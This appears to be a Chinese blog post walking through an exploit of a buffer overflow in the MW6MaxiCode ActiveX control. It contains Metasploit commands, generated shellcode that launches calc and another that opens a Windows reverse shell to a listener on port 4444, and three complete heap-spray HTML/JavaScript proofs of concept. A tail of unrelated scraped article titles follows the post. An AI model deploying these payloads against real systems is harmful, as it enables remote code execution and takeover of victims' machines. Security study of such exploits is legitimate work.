软件下载地址: http://www.exploit-db.com/wp-content/themes/exploit/applications/b02221a6c4b96f8319127e34f3c4f0ee-MW6MaxiCode.ZIP

学习于  http://www.exploit-db.com/exploits/31178/

1)MSF  生成shellcode    calc

msf > msfpayload windows/exec CMD=calc J
[*] exec: msfpayload windows/exec CMD=calc J// windows/exec - 196 bytes
// http://www.metasploit.com
// VERBOSE=false, PrependMigrate=false, EXITFUNC=process,
// CMD=calc
%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a%ueb12%u5d86%u016a%u858d%u00b9%u0000%u6850%u8b31%u876f%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72%u006a%uff53%u63d5%u6c61%u0063

利用上面生成的shellcode制作 POC

<object classid='clsid:2355C601-37D1-42B4-BEB1-03C773298DC8' id='target' /></object>
<script>
var nop = unescape("%u9090");
var shellcode=unescape("%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a%ueb12%u5d86%u016a%u858d%u00b9%u0000%u6850%u8b31%u876f%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72%u006a%uff53%u63d5%u6c61%u0063");  while (nop.length < 0x100000/2)
{nop += nop;}  nop=nop.substring(0,0x100000-32/2-4/2-2/2-1-shellcode.length);
nop =nop+ shellcode;  var memory = new Array();  for (var i=0;i<200;i++)
{memory[i] += nop;}  arg1='\x0a';
while(arg1.length < 2000){arg1 += '\x0c';}
arg2 = '\x0c\x0c\x0c\x0c';
arg1 = arg1 + arg2;
target.Data = arg1;
</script>  

2)利用MSF  生成  反弹shell   主机nc -lvp 4444 监听

 payload(shell_reverse_tcp) > generate -t js_le
// windows/shell_reverse_tcp - 314 bytes
// http://www.metasploit.com
// VERBOSE=false, LHOST=10.16.2.4, LPORT=4444,
// ReverseConnectRetries=5, ReverseAllowProxy=false,
// PrependMigrate=false, EXITFUNC=process,
// InitialAutoRunScript=, AutoRunScript=
%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050%u5040%u5040%uea68%udf0f%uffe0%u89d5%u68c7%u100a%u0402%u0268%u1100%u895c%u6ae6%u5610%u6857%ua599%u6174%ud5ff%u6368%u646d%u8900%u57e3%u5757%uf631%u126a%u5659%ufde2%uc766%u2444%u013c%u8d01%u2444%uc610%u4400%u5054%u5656%u4656%u4e56%u5656%u5653%u7968%u3fcc%uff86%u89d5%u4ee0%u4656%u30ff%u0868%u1d87%uff60%ubbd5%ub5f0%u56a2%ua668%ubd95%uff9d%u3cd5%u7c06%u800a%ue0fb%u0575%u47bb%u7213%u6a6f%u5300%ud5ff

POC

<object classid='clsid:2355C601-37D1-42B4-BEB1-03C773298DC8' id='target' /></object>
<script>
var nop = unescape("%u9090");
var shellcode=unescape("%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050%u5040%u5040%uea68%udf0f%uffe0%u89d5%u68c7%u100a%u0402%u0268%u1100%u895c%u6ae6%u5610%u6857%ua599%u6174%ud5ff%u6368%u646d%u8900%u57e3%u5757%uf631%u126a%u5659%ufde2%uc766%u2444%u013c%u8d01%u2444%uc610%u4400%u5054%u5656%u4656%u4e56%u5656%u5653%u7968%u3fcc%uff86%u89d5%u4ee0%u4656%u30ff%u0868%u1d87%uff60%ubbd5%ub5f0%u56a2%ua668%ubd95%uff9d%u3cd5%u7c06%u800a%ue0fb%u0575%u47bb%u7213%u6a6f%u5300%ud5ff")while (nop.length < 0x100000/2)
{nop += nop;}  nop=nop.substring(0,0x100000-32/2-4/2-2/2-1-shellcode.length);
nop =nop+ shellcode;  var memory = new Array();  for (var i=0;i<200;i++)
{memory[i] += nop;}  arg1='\x0a';
while(arg1.length < 2000){arg1 += '\x0c';}
arg2 = '\x0c\x0c\x0c\x0c';
arg1 = arg1 + arg2;
target.Data = arg1;
</script>  

3)利用自己的calc  shellcode生成POC

<object classid='clsid:2355C601-37D1-42B4-BEB1-03C773298DC8' id='target' /></object>
<script>
var nop = unescape("%u9090");
var shellcode=
"\u68fc\ubcc9\u6ba6\u6368\ud189\u8b4f\u8df4\uf47e"+
"\udb33\u04b7\ue32b\ud233\u8b64\u305a\u4b8b\u8b0c"+
"\u1c49\u098b\u518b\u8b18\u3452\ufa80\u7433\u8b02"+
"\u8b09\u0869\u60ad\u458b\u8b3c\u054c\u0378\u8bcd"+
"\u2059\udd03\uff33\u8b47\ubb34\uf503\u0f99\u06be"+
"\uc43a\u0874\ucac1\u0307\u46d0\uf1eb\u543b\u1c24"+
"\ue475\u598b\u0324\u66dd\u3c8b\u8b7b\u1c59\udd03"+
"\u2c03\u95bb\uab5f\u6157\uc93d\ua6bc\u756b\u33b5"+
"\u33db\u53c0\u3c40\u7520\u33fa\u53db\u63bb\u6c61"+
"\u5363\ucc8b\uc033\u5454\u5050\u5450\u5050\u5051"+
"\u57ff\u33fc\u53db\u57ff\ucdf8\u9090";  while (nop.length < 0x100000/2)
{nop += nop;}  nop=nop.substring(0,0x100000-32/2-4/2-2/2-shellcode.length);
nop =nop+ shellcode;  var memory = new Array();  for (var i=0;i<200;i++)
{memory[i] += nop;}  arg1='\x0a';
while(arg1.length < 2000){arg1 += '\x0c';}
arg2 = '\x0c\x0c\x0c\x0c';
arg1 = arg1 + arg2;
target.Data = arg1;
</script>  

转载于:https://www.cnblogs.com/zcc1414/p/3982357.html

MW6MaxiCode ACX溢出相关推荐

  1. CSS 文字溢出显示省略号

    溢出显示省略号的代码:其中 1 是行数. overflow: hidden; text-overflow: ellipsis; display: -webkit-box; -webkit-line-c ...

  2. Tomcat内存溢出解决方法

    Java内存溢出详解 一.常见的Java内存溢出有以下三种: 1. java.lang.OutOfMemoryError: Java heap space ----JVM Heap(堆)溢出 JVM在 ...

  3. 深入理解Java虚拟机——第二章——Java内存区域与内存溢出异常

    运行时数据区域 Java虚拟机运行时数据区域 程序计数器 程序计数器可以看做是当前线程所执行的字节码的行号指示器.字节码解释器工作时就是通过改变这个计数器的值来选取下一条所需要执行的字节码指令,分支. ...

  4. Java内存溢出详解之Tomcat配置

    Java内存溢出详解 转自:http://elf8848.iteye.com/blog/378805 一.常见的Java内存溢出有以下三种: 1. java.lang.OutOfMemoryError ...

  5. html溢出攻击,溢出(漏洞)攻击的实现及防御

    前言 媒体上关于系统漏洞的话题一直不断,在我所接触的用一些朋友和用户中虽然也知道打系统补丁很重要,但却又一直不以为然总以为网络上的危险离自己很远,大部份人都认为进行一次远程攻击很困难甚至认为只要安装了 ...

  6. 解决Mask RCNN训练时GPU内存溢出问题

    首先自己是个小白对于如何使用GPU跑程序这个学习了一下: (1)使用的是putty,安装了Anaconda这个IDE环境,用的conda install tensorflow-gpu安装的GPU版本t ...

  7. 一个简单的缓冲区溢出的思考

    从大二开始真正接触技术开始,从最早的HTML,PHP,WEB开发.一直以为以后可能会从事开发的工作,碰巧大三上的时候和同专业的郭子,邹豪参加了南京的一个信息安全技能大赛,才真正找到了兴趣的方向,也从懵 ...

  8. 内存溢出和内存泄漏的定义,产生原因以及解决方法(面试经验总结)

    一.定义(概念与区别) 内存溢出 out of memory,是指程序在申请内存时,没有足够的内存空间供其使用,出现out of memory:比如申请 了一个integer,但给它存了long才能存 ...

  9. 从内存溢出看Java 环境中的内存结构

    作为有个java程序员,我想大家对下面出现的这几个场景并不陌生,倍感亲切,深恶痛绝,抓心挠肝,一定会回过头来问为什么为什么为什么会这样,嘿嘿,让我们看一下我们日常在开发过程中接触内存溢出的异常: Ex ...

最新文章

  1. Angular中ngModel的$render的详解
  2. serviceloader java_【java编程】ServiceLoader使用看这一篇就够了
  3. VS2019 配色_这个双11,凯里-欧文陪你过!欧文6正式发布,城市版配色真的香
  4. linux添加ssh公钥免密登录
  5. 一位程序员 8 年的物联网奋斗史
  6. python的zip()函数,压缩多个可迭代对象
  7. Echarts数据可视化series-effectscatter特效散点图,开发全解+完美注释
  8. Java 基础 之 变量
  9. 非常精美的唐诗,无与伦比哦
  10. pixhawk源码下载与编译
  11. 状压dp解释及位运算相关介绍
  12. 布道微服务_03服务的发布和引用
  13. Phalanx HDU 【2859】
  14. linux中的find查找文件或者目录、locate快速定位文件路径
  15. [转]增强型N沟道mos管(如si2300)开关条件
  16. Android系统ROM+RAM基础裁剪
  17. 明万历年间抗击倭寇援朝战役
  18. “银联在线支付”签约无需任何条件,个人也可以完成签约
  19. 招商银行信用卡使用说明
  20. 一年时间,拿到了人生中的第一个10万

热门文章

  1. liunx+python+django框架实现图片生成二维码
  2. uml的用例图中扩展关系与包含关系
  3. 今日头条测试开发实习生面试
  4. 华为发布新一代CloudLink协作智真
  5. 手绘风格的白板Excalidraw
  6. 360浏览器网页按钮点击无效
  7. php处理微信weui图片上传
  8. python基于opencv的手势识别_求python opencv 手势识别源代码
  9. 字节跳动python后端_【字节跳动】[字节跳动][实习]后端研发工程师(python+go)...
  10. inflect java_驼峰、下划线、单复数、表名-类名转换...通通交给字符串处理库:i...